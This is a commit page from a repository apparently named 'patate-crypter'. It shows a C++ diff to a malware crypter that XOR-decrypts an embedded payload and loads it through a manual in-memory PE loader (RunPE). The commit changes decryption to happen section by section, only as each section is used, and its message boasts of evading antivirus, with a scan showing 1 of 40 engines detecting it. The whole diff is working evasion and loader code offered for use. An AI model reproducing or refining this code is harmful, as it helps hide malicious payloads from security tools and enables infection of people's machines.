patate/patate-crypter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

only decrypt stuff when using them, 1/40 detect

Browse Source 
fuck ESET, i got you ! https://kleenscan.com/scan_result/a58d3cad2abdfbb7a93b77deefd8dff4eed3a88af6e70d405768ed9c87dc8027
This commit is contained in:
ALittlePatate
2023-09-21 11:05:13 +02:00
parent ae7910a287
commit 49a4b62f0f
4 changed files with 25 additions and 19 deletions
Download Patch File Download Diff File Expand all files Collapse all files

31
main.cpp
View File

@@ -30,6 +30,18 @@ Works with :
- Doesn't copy headers
*/
void decrypt(const char* key, int offset = 0, int limit = -1) {
//START
size_t key_size = strlen(key);
const int bufferSize = sizeof(sample) / sizeof(sample[0]);
if (limit == -1) limit = bufferSize;
if (key_size == 0) return;
for (int i = offset; i < limit ; i++) {
sample[i] ^= key[i%key_size];
}
//END
}
// This function will load a DLL from a buffer into the current process.
// The DLL is expected to be in the PE format.
//
@@ -48,6 +60,8 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
return NULL;
}
decrypt(KEY, 0, 1024); // decrypt only the header
// Get a pointer to the DOS header.
const IMAGE_DOS_HEADER* dos_header = static_cast<const IMAGE_DOS_HEADER*>(dll_buffer);
@@ -79,8 +93,10 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
// Copy the section data to the allocated memory.
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
const IMAGE_SECTION_HEADER* section_header = section_headers + i;
decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //decrypt section
memcpy(static_cast<char*>(image_base) + section_header->VirtualAddress, static_cast<const char*>(dll_buffer) + section_header->PointerToRawData, section_header->SizeOfRawData);
}
decrypt(KEY, section_header->PointerToRawData, section_header->PointerToRawData + section_header->SizeOfRawData); //encrypt back section
}
DEBUG_PRINTF("[+] Wrote section data\n");
@@ -217,16 +233,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
//END
}
void decrypt(const char* key) {
//START
size_t key_size = strlen(key);
if (key_size == 0) return;
for (int i = 0; i < sizeof(sample) / sizeof(sample[0]); i++) {
sample[i] ^= key[i%key_size];
}
//END
}
void allo() {
//START
AllocConsole();
@@ -251,8 +257,7 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm
// Load the DLL from a buffer in memory
const int bufferSize = sizeof(sample) / sizeof(sample[0]);
decrypt(KEY);
HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS);
if (dll == NULL) {
DEBUG_PRINTF("[-] Failed to load DLL\n");